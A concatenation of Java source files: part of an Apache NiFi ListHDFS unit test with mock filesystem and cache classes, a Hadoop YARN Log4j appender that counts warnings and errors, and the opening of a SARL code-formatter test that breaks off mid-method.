proc.fileSystem.addFileStatus(new Path("/test/testDir/someDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/someDir/1.out")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("1.out")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else if (filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testNotRecursive() throws InterruptedException {
runner.setProperty(ListHDFS.RECURSE_SUBDIRS, "false");
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff1 = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff1.assertAttributeEquals("path", "/test");
mff1.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testNoListUntilUpdateFromRemoteOnPrimaryNodeChange() throws IOException, InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 1999L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff1 = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff1.assertAttributeEquals("path", "/test");
mff1.assertAttributeEquals("filename", "testFile.txt");
runner.clearTransferState();
// add new file to pull
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 2000L, 0L, create777(), "owner", "group", new Path("/test/testFile2.txt")));
runner.getStateManager().setFailOnStateGet(Scope.CLUSTER, true);
// Should fail to perform @OnScheduled methods.
try {
runner.run();
Assert.fail("Processor ran successfully");
} catch (final AssertionError e) {
}
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
// Should fail to perform @OnScheduled methods.
try {
runner.run();
Assert.fail("Processor ran successfully");
} catch (final AssertionError e) {
}
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
runner.getStateManager().setFailOnStateGet(Scope.CLUSTER, false);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
Map<String, String> newState = runner.getStateManager().getState(Scope.CLUSTER).toMap();
assertEquals("2000", newState.get(ListHDFS.LISTING_TIMESTAMP_KEY));
assertEquals("1999", newState.get(ListHDFS.EMITTED_TIMESTAMP_KEY));
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
newState = runner.getStateManager().getState(Scope.CLUSTER).toMap();
assertEquals("2000", newState.get(ListHDFS.LISTING_TIMESTAMP_KEY));
assertEquals("2000", newState.get(ListHDFS.EMITTED_TIMESTAMP_KEY));
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
}
@Test
public void testOnlyNewestEntriesHeldBack() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 8L, 0L, create777(), "owner", "group", new Path("/test/testFile2.txt")));
// this is a directory, so it won't be counted toward the entries
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 8L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 100L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 100L, 0L, create777(), "owner", "group", new Path("/test/testDir/2.txt")));
// The first iteration should pick up 2 files with the smaller timestamps.
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
// Next iteration should pick up the other 2 files, since nothing else was added.
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 4);
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 110L, 0L, create777(), "owner", "group", new Path("/test/testDir/3.txt")));
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 4);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 5);
}
@Test
public void testMinAgeMaxAge() throws IOException, InterruptedException {
long now = new Date().getTime();
long oneHourAgo = now - 3600000;
long twoHoursAgo = now - 2*3600000;
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, now, now, create777(), "owner", "group", new Path("/test/willBeIgnored.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, now-5, now-5, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, oneHourAgo, oneHourAgo, create777(), "owner", "group", new Path("/test/testFile1.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, twoHoursAgo, twoHoursAgo, create777(), "owner", "group", new Path("/test/testFile2.txt")));
// all files
runner.run();
runner.assertValid();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// invalid min_age > max_age
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.setProperty(ListHDFS.MAX_AGE, "1 sec");
runner.assertNotValid();
// only one file (one hour ago)
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.setProperty(ListHDFS.MAX_AGE, "90 min");
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // will ignore the file for this cycle
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
// Next iteration should pick up the file, since nothing else was added.
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0).assertAttributeEquals("filename", "testFile1.txt");
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// two files (one hour ago and two hours ago)
runner.setProperty(ListHDFS.MIN_AGE, "30 sec");
runner.removeProperty(ListHDFS.MAX_AGE);
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
runner.clearTransferState();
runner.getStateManager().clear(Scope.CLUSTER);
// two files (now and one hour ago)
runner.setProperty(ListHDFS.MIN_AGE, "0 sec");
runner.setProperty(ListHDFS.MAX_AGE, "90 min");
runner.assertValid();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
}
@Test
public void testListAfterDirectoryChange() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test1"), new FileStatus(1L, false, 1, 1L, 100L,0L, create777(), "owner", "group", new Path("/test1/testFile-1_1.txt")));
proc.fileSystem.addFileStatus(new Path("/test2"), new FileStatus(1L, false, 1, 1L, 150L,0L, create777(), "owner", "group", new Path("/test2/testFile-2_1.txt")));
proc.fileSystem.addFileStatus(new Path("/test1"), new FileStatus(1L, false, 1, 1L, 200L,0L, create777(), "owner", "group", new Path("/test1/testFile-1_2.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "/test1");
runner.run(); // Initial run, latest file from /test1 will be ignored
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Latest file i.e. testFile-1_2.txt from /test1 should also be picked up now
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
runner.setProperty(ListHDFS.DIRECTORY, "/test2"); // Changing directory should reset the state
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Will ignore the files for this cycle
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run(); // Since state has been reset, testFile-2_1.txt from /test2 should be picked up
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
}
private FsPermission create777() {
return new FsPermission((short) 0777);
}
private class ListHDFSWithMockedFileSystem extends ListHDFS {
private final MockFileSystem fileSystem = new MockFileSystem();
private final KerberosProperties testKerberosProps;
public ListHDFSWithMockedFileSystem(KerberosProperties kerberosProperties) {
this.testKerberosProps = kerberosProperties;
}
@Override
protected KerberosProperties getKerberosProperties(File kerberosConfigFile) {
return testKerberosProps;
}
@Override
protected FileSystem getFileSystem() {
return fileSystem;
}
@Override
protected File getPersistenceFile() {
return new File("target/conf/state-file");
}
@Override
protected FileSystem getFileSystem(final Configuration config) throws IOException {
return fileSystem;
}
}
private class MockFileSystem extends FileSystem {
private final Map<Path, Set<FileStatus>> fileStatuses = new HashMap<>();
public void addFileStatus(final Path parent, final FileStatus child) {
Set<FileStatus> children = fileStatuses.get(parent);
if (children == null) {
children = new HashSet<>();
fileStatuses.put(parent, children);
}
children.add(child);
}
@Override
@SuppressWarnings("deprecation")
public long getDefaultBlockSize() {
return 1024L;
}
@Override
@SuppressWarnings("deprecation")
public short getDefaultReplication() {
return 1;
}
@Override
public URI getUri() {
return null;
}
@Override
public FSDataInputStream open(final Path f, final int bufferSize) throws IOException {
return null;
}
@Override
public FSDataOutputStream create(final Path f, final FsPermission permission, final boolean overwrite, final int bufferSize, final short replication,
final long blockSize, final Progressable progress) throws IOException {
return null;
}
@Override
public FSDataOutputStream append(final Path f, final int bufferSize, final Progressable progress) throws IOException {
return null;
}
@Override
public boolean rename(final Path src, final Path dst) throws IOException {
return false;
}
@Override
public boolean delete(final Path f, final boolean recursive) throws IOException {
return false;
}
@Override
public FileStatus[] listStatus(final Path f) throws FileNotFoundException, IOException {
final Set<FileStatus> statuses = fileStatuses.get(f);
if (statuses == null) {
return new FileStatus[0];
}
return statuses.toArray(new FileStatus[statuses.size()]);
}
@Override
public void setWorkingDirectory(final Path new_dir) {
}
@Override
public Path getWorkingDirectory() {
return new Path(new File(".").getAbsolutePath());
}
@Override
public boolean mkdirs(final Path f, final FsPermission permission) throws IOException {
return false;
}
@Override
public FileStatus getFileStatus(final Path f) throws IOException {
return null;
}
}
private class MockCacheClient extends AbstractControllerService implements DistributedMapCacheClient {
private final ConcurrentMap<Object, Object> values = new ConcurrentHashMap<>();
private boolean failOnCalls = false;
private void verifyNotFail() throws IOException {
if ( failOnCalls ) {
throw new IOException("Could not call to remote service because Unit Test marked service unavailable");
}
}
@Override
public <K, V> boolean putIfAbsent(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer) throws IOException {
verifyNotFail();
final Object retValue = values.putIfAbsent(key, value);
return (retValue == null);
}
@Override
@SuppressWarnings("unchecked")
public <K, V> V getAndPutIfAbsent(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer,
final Deserializer<V> valueDeserializer) throws IOException {
verifyNotFail();
return (V) values.putIfAbsent(key, value);
}
@Override
public <K> boolean containsKey(final K key, final Serializer<K> keySerializer) throws IOException {
verifyNotFail();
return values.containsKey(key);
}
@Override
public <K, V> void put(final K key, final V value, final Serializer<K> keySerializer, final Serializer<V> valueSerializer) throws IOException {
verifyNotFail();
values.put(key, value);
}
@Override
@SuppressWarnings("unchecked")
public <K, V> V get(final K key, final Serializer<K> keySerializer, final Deserializer<V> valueDeserializer) throws IOException {
verifyNotFail();
return (V) values.get(key);
}
@Override
public void close() throws IOException {
}
@Override
public <K> boolean remove(final K key, final Serializer<K> serializer) throws IOException {
verifyNotFail();
values.remove(key);
return true;
}
@Override
public long removeByPattern(String regex) throws IOException {
verifyNotFail();
final List<Object> removedRecords = new ArrayList<>();
Pattern p = Pattern.compile(regex);
for (Object key : values.keySet()) {
// Key must be backed by something that array() returns a byte[] that can be converted into a String via the default charset
Matcher m = p.matcher(key.toString());
if (m.matches()) {
removedRecords.add(values.get(key));
}
}
final long numRemoved = removedRecords.size();
removedRecords.forEach(values::remove);
return numRemoved;
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.util;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.classification.InterfaceStability;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.Time;
import org.apache.log4j.AppenderSkeleton;
import org.apache.log4j.Level;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LoggingEvent;
import java.util.*;
@InterfaceAudience.Private
@InterfaceStability.Unstable
public class Log4jWarningErrorMetricsAppender extends AppenderSkeleton {
public static final String LOG_METRICS_APPENDER = "RM_LOG_METRICS_APPENDER";
static final int MAX_MESSAGE_SIZE = 2048;
static public class Element {
public Long count;
public Long timestampSeconds;
Element(Long count, Long timestampSeconds) {
this.count = count;
this.timestampSeconds = timestampSeconds;
}
}
static class PurgeElement implements Comparable<PurgeElement> {
String message;
Long timestamp;
PurgeElement(String message, Long timestamp) {
this.message = message;
this.timestamp = timestamp;
}
public int compareTo(PurgeElement e) {
if (e == null) {
throw new NullPointerException("Null element passed to compareTo");
}
int ret = this.timestamp.compareTo(e.timestamp);
if (ret != 0) {
return ret;
}
return this.message.compareTo(e.message);
}
@Override
public boolean equals(Object e) {
if (e == null || !(e instanceof PurgeElement)) {
return false;
}
if (e == this) {
return true;
}
PurgeElement el = (PurgeElement) e;
return (this.message.equals(el.message))
&& (this.timestamp.equals(el.timestamp));
}
@Override
public int hashCode() {
return this.timestamp.hashCode();
}
}
Map<String, SortedMap<Long, Integer>> errors;
Map<String, SortedMap<Long, Integer>> warnings;
SortedMap<Long, Integer> errorsTimestampCount;
SortedMap<Long, Integer> warningsTimestampCount;
SortedSet<PurgeElement> errorsPurgeInformation;
SortedSet<PurgeElement> warningsPurgeInformation;
Timer cleanupTimer;
long cleanupInterval;
long messageAgeLimitSeconds;
int maxUniqueMessages;
final Object lock = new Object();
/**
* Create an appender to keep track of the errors and warnings logged by the
* system. It will keep purge messages older than 2 days. It will store upto
* the last 500 unique errors and the last 500 unique warnings. The thread to
* purge message will run every 5 minutes, unless the 500 message limit is hit
* earlier.
*/
public Log4jWarningErrorMetricsAppender() {
this(5 * 60, 24 * 60 * 60, 250);
}
/**
* Create an appender to keep track of the errors and warnings logged by the
* system.
*
* @param cleanupIntervalSeconds
* the interval at which old messages are purged to prevent the
* message stores from growing unbounded
* @param messageAgeLimitSeconds
* the maximum age of a message in seconds before it is purged from
* the store
* @param maxUniqueMessages
* the maximum number of unique messages of each type we keep before
* we start purging
*/
public Log4jWarningErrorMetricsAppender(int cleanupIntervalSeconds,
long messageAgeLimitSeconds, int maxUniqueMessages) {
super();
errors = new HashMap<>();
warnings = new HashMap<>();
errorsTimestampCount = new TreeMap<>();
warningsTimestampCount = new TreeMap<>();
errorsPurgeInformation = new TreeSet<>();
warningsPurgeInformation = new TreeSet<>();
cleanupTimer = new Timer();
cleanupInterval = cleanupIntervalSeconds * 1000;
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), cleanupInterval);
this.messageAgeLimitSeconds = messageAgeLimitSeconds;
this.maxUniqueMessages = maxUniqueMessages;
this.setName(LOG_METRICS_APPENDER);
this.setThreshold(Level.WARN);
}
/**
* {@inheritDoc}
*/
@Override
protected void append(LoggingEvent event) {
String message = event.getRenderedMessage();
String[] throwableStr = event.getThrowableStrRep();
if (throwableStr != null) {
message = message + "\n" + StringUtils.join("\n", throwableStr);
message =
org.apache.commons.lang3.StringUtils.left(message, MAX_MESSAGE_SIZE);
}
int level = event.getLevel().toInt();
if (level == Level.WARN_INT || level == Level.ERROR_INT) {
// store second level information
Long eventTimeSeconds = event.getTimeStamp() / 1000;
Map<String, SortedMap<Long, Integer>> map;
SortedMap<Long, Integer> timestampsCount;
SortedSet<PurgeElement> purgeInformation;
if (level == Level.WARN_INT) {
map = warnings;
timestampsCount = warningsTimestampCount;
purgeInformation = warningsPurgeInformation;
} else {
map = errors;
timestampsCount = errorsTimestampCount;
purgeInformation = errorsPurgeInformation;
}
updateMessageDetails(message, eventTimeSeconds, map, timestampsCount,
purgeInformation);
}
}
private void updateMessageDetails(String message, Long eventTimeSeconds,
Map<String, SortedMap<Long, Integer>> map,
SortedMap<Long, Integer> timestampsCount,
SortedSet<PurgeElement> purgeInformation) {
synchronized (lock) {
if (map.containsKey(message)) {
SortedMap<Long, Integer> tmp = map.get(message);
Long lastMessageTime = tmp.lastKey();
int value = 1;
if (tmp.containsKey(eventTimeSeconds)) {
value = tmp.get(eventTimeSeconds) + 1;
}
tmp.put(eventTimeSeconds, value);
purgeInformation.remove(new PurgeElement(message, lastMessageTime));
} else {
SortedMap<Long, Integer> value = new TreeMap<>();
value.put(eventTimeSeconds, 1);
map.put(message, value);
if (map.size() > maxUniqueMessages * 2) {
cleanupTimer.cancel();
cleanupTimer = new Timer();
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), 0);
}
}
purgeInformation.add(new PurgeElement(message, eventTimeSeconds));
int newValue = 1;
if (timestampsCount.containsKey(eventTimeSeconds)) {
newValue = timestampsCount.get(eventTimeSeconds) + 1;
}
timestampsCount.put(eventTimeSeconds, newValue);
}
}
/**
* {@inheritDoc}
*/
@Override
public void close() {
cleanupTimer.cancel();
}
/**
* {@inheritDoc}
*/
@Override
public boolean requiresLayout() {
return false;
}
/**
* Get the counts of errors in the time periods provided. Note that the counts
* provided by this function may differ from the ones provided by
* getErrorMessagesAndCounts since the message store is purged at regular
* intervals to prevent it from growing without bounds, while the store for
* the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs(in seconds) for which the counts are
* desired
* @return list of error counts in the time periods corresponding to cutoffs
*/
public List<Integer> getErrorCounts(List<Long> cutoffs) {
return this.getCounts(errorsTimestampCount, cutoffs);
}
/**
* Get the counts of warnings in the time periods provided. Note that the
* counts provided by this function may differ from the ones provided by
* getWarningMessagesAndCounts since the message store is purged at regular
* intervals to prevent it from growing without bounds, while the store for
* the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs(in seconds) for which the counts are
* desired
* @return list of warning counts in the time periods corresponding to cutoffs
*/
public List<Integer> getWarningCounts(List<Long> cutoffs) {
return this.getCounts(warningsTimestampCount, cutoffs);
}
private List<Integer> getCounts(SortedMap<Long, Integer> map,
List<Long> cutoffs) {
List<Integer> ret = new ArrayList<>();
Long largestCutoff = Collections.min(cutoffs);
for (int i = 0; i < cutoffs.size(); ++i) {
ret.add(0);
}
synchronized (lock) {
Map<Long, Integer> submap = map.tailMap(largestCutoff);
for (Map.Entry<Long, Integer> entry : submap.entrySet()) {
for (int i = 0; i < cutoffs.size(); ++i) {
if (entry.getKey() >= cutoffs.get(i)) {
int tmp = ret.get(i);
ret.set(i, tmp + entry.getValue());
}
}
}
}
return ret;
}
/**
* Get the errors and the number of occurrences for each of the errors for the
* time cutoffs provided. Note that the counts provided by this function may
* differ from the ones provided by getErrorCounts since the message store is
* purged at regular intervals to prevent it from growing without bounds,
* while the store for the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs(in seconds) for which the counts are
* desired
* @return list of maps corresponding for each cutoff provided; each map
* contains the error and the number of times the error occurred in
* the time period
*/
public List<Map<String, Element>>
getErrorMessagesAndCounts(List<Long> cutoffs) {
return this.getElementsAndCounts(errors, cutoffs, errorsPurgeInformation);
}
/**
* Get the warning and the number of occurrences for each of the warnings for
* the time cutoffs provided. Note that the counts provided by this function
* may differ from the ones provided by getWarningCounts since the message
* store is purged at regular intervals to prevent it from growing without
* bounds, while the store for the counts is purged less frequently.
*
* @param cutoffs
* list of timestamp cutoffs(in seconds) for which the counts are
* desired
* @return list of maps corresponding for each cutoff provided; each map
* contains the warning and the number of times the error occurred in
* the time period
*/
public List<Map<String, Element>> getWarningMessagesAndCounts(
List<Long> cutoffs) {
return this.getElementsAndCounts(warnings, cutoffs, warningsPurgeInformation);
}
private List<Map<String, Element>> getElementsAndCounts(
Map<String, SortedMap<Long, Integer>> map, List<Long> cutoffs,
SortedSet<PurgeElement> purgeInformation) {
if (purgeInformation.size() > maxUniqueMessages) {
ErrorAndWarningsCleanup cleanup = new ErrorAndWarningsCleanup();
long cutoff = Time.now() - (messageAgeLimitSeconds * 1000);
cutoff = (cutoff / 1000);
cleanup.cleanupMessages(map, purgeInformation, cutoff, maxUniqueMessages);
}
List<Map<String, Element>> ret = new ArrayList<>(cutoffs.size());
for (int i = 0; i < cutoffs.size(); ++i) {
ret.add(new HashMap<String, Element>());
}
synchronized (lock) {
for (Map.Entry<String, SortedMap<Long, Integer>> element : map.entrySet()) {
for (int i = 0; i < cutoffs.size(); ++i) {
Map<String, Element> retMap = ret.get(i);
SortedMap<Long, Integer> qualifyingTimes =
element.getValue().tailMap(cutoffs.get(i));
long count = 0;
for (Map.Entry<Long, Integer> entry : qualifyingTimes.entrySet()) {
count += entry.getValue();
}
if (!qualifyingTimes.isEmpty()) {
retMap.put(element.getKey(),
new Element(count, qualifyingTimes.lastKey()));
}
}
}
}
return ret;
}
// getters and setters for log4j
public long getCleanupInterval() {
return cleanupInterval;
}
public void setCleanupInterval(long cleanupInterval) {
this.cleanupInterval = cleanupInterval;
}
public long getMessageAgeLimitSeconds() {
return messageAgeLimitSeconds;
}
public void setMessageAgeLimitSeconds(long messageAgeLimitSeconds) {
this.messageAgeLimitSeconds = messageAgeLimitSeconds;
}
public int getMaxUniqueMessages() {
return maxUniqueMessages;
}
public void setMaxUniqueMessages(int maxUniqueMessages) {
this.maxUniqueMessages = maxUniqueMessages;
}
class ErrorAndWarningsCleanup extends TimerTask {
@Override
public void run() {
long cutoff = Time.now() - (messageAgeLimitSeconds * 1000);
cutoff = (cutoff / 1000);
cleanupMessages(errors, errorsPurgeInformation, cutoff, maxUniqueMessages);
cleanupMessages(warnings, warningsPurgeInformation, cutoff,
maxUniqueMessages);
cleanupCounts(errorsTimestampCount, cutoff);
cleanupCounts(warningsTimestampCount, cutoff);
try {
cleanupTimer.schedule(new ErrorAndWarningsCleanup(), cleanupInterval);
} catch (IllegalStateException ie) {
// don't do anything since new timer is already scheduled
}
}
void cleanupMessages(Map<String, SortedMap<Long, Integer>> map,
SortedSet<PurgeElement> purgeInformation, long cutoff,
int mapTargetSize) {
PurgeElement el = new PurgeElement("", cutoff);
synchronized (lock) {
SortedSet<PurgeElement> removeSet = purgeInformation.headSet(el);
Iterator<PurgeElement> it = removeSet.iterator();
while (it.hasNext()) {
PurgeElement p = it.next();
map.remove(p.message);
it.remove();
}
// don't keep more mapTargetSize keys
if (purgeInformation.size() > mapTargetSize) {
Object[] array = purgeInformation.toArray();
int cutoffIndex = purgeInformation.size() - mapTargetSize;
for (int i = 0; i < cutoffIndex; ++i) {
PurgeElement p = (PurgeElement) array[i];
map.remove(p.message);
purgeInformation.remove(p);
}
}
}
}
void cleanupCounts(SortedMap<Long, Integer> map, long cutoff) {
synchronized (lock) {
Iterator<Map.Entry<Long, Integer>> it = map.entrySet().iterator();
while (it.hasNext()) {
Map.Entry<Long, Integer> element = it.next();
if (element.getKey() < cutoff) {
it.remove();
}
}
}
}
}
// helper function
public static Log4jWarningErrorMetricsAppender findAppender() {
Enumeration appenders = Logger.getRootLogger().getAllAppenders();
while(appenders.hasMoreElements()) {
Object obj = appenders.nextElement();
if(obj instanceof Log4jWarningErrorMetricsAppender) {
return (Log4jWarningErrorMetricsAppender) obj;
}
}
return null;
}
}
|
|
/*
* Copyright (C) 2014-2017 the original authors or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.sarl.lang.tests.modules.formatting2;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Suite;
import org.junit.runners.Suite.SuiteClasses;
/** Tests for formatting fields.
*
* @author $Author: sgalland$
* @version $Name$ $Revision$ $Date$
* @mavengroupid $GroupId$
* @mavenartifactid $ArtifactId$
*/
@RunWith(Suite.class)
@SuiteClasses({
ValueFieldFormatterTest.FormatterAPITest.class,
})
@SuppressWarnings("all")
public class ValueFieldFormatterTest {
/**
* @author $Author: sgalland$
* @version $FullVersion$
* @mavengroupid $GroupId$
* @mavenartifactid $ArtifactId$
*/
public static class FormatterAPITest extends AbstractMemberFormatterTest {
@Test
public void type() throws Exception {
String source = unformattedCode("val xxx:int");
String expected = formattedCode(" val xxx : int");
assertFormatted(source, expected);
}
@Test
public void types() throws Exception {
String source = unformattedCode("val xxx:int val yyy:boolean");
String expected = formattedCode(
" val xxx : int",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void initialValue() throws Exception {
String source = unformattedCode("val xxx=5");
String expected = formattedCode(" val xxx = 5");
assertFormatted(source, expected);
}
@Test
public void initialValues() throws Exception {
String source = unformattedCode("val xxx=5 val yyy=true");
String expected = formattedCode(
" val xxx = 5",
" val yyy = true");
assertFormatted(source, expected);
}
@Test
public void initialValueType() throws Exception {
String source = unformattedCode("val xxx=5 val yyy : boolean");
String expected = formattedCode(
" val xxx = 5",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeInitialValue() throws Exception {
String source = unformattedCode("val xxx:int val yyy=true");
String expected = formattedCode(
" val xxx : int",
" val yyy = true");
assertFormatted(source, expected);
}
@Test
public void typeType() throws Exception {
String source = unformattedCode("val xxx:int val yyy:boolean");
String expected = formattedCode(
" val xxx : int",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeComaType() throws Exception {
String source = unformattedCode("val xxx:int ; val yyy:boolean");
String expected = formattedCode(
" val xxx : int;",
" val yyy : boolean");
assertFormatted(source, expected);
}
@Test
public void typeInit() throws Exception {
String source = unformattedCode("val xxx:int=45");
String expected = formattedCode(" val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void modifiers() throws Exception {
String source = unformattedCode("protected final val xxx:int=45");
String expected = formattedCode(" protected final val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void twoAnnotations() throws Exception {
String source = unformattedCode("@Pure@Beta val xxx:int=45");
String expected = formattedCode(" @Pure @Beta val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void threeAnnotations() throws Exception {
String source = unformattedCode(multilineString(
"@Pure@Beta",
"@Hello val xxx:int=45"));
String expected = formattedCode(
" @Pure @Beta",
" @Hello val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void annotationValue() throws Exception {
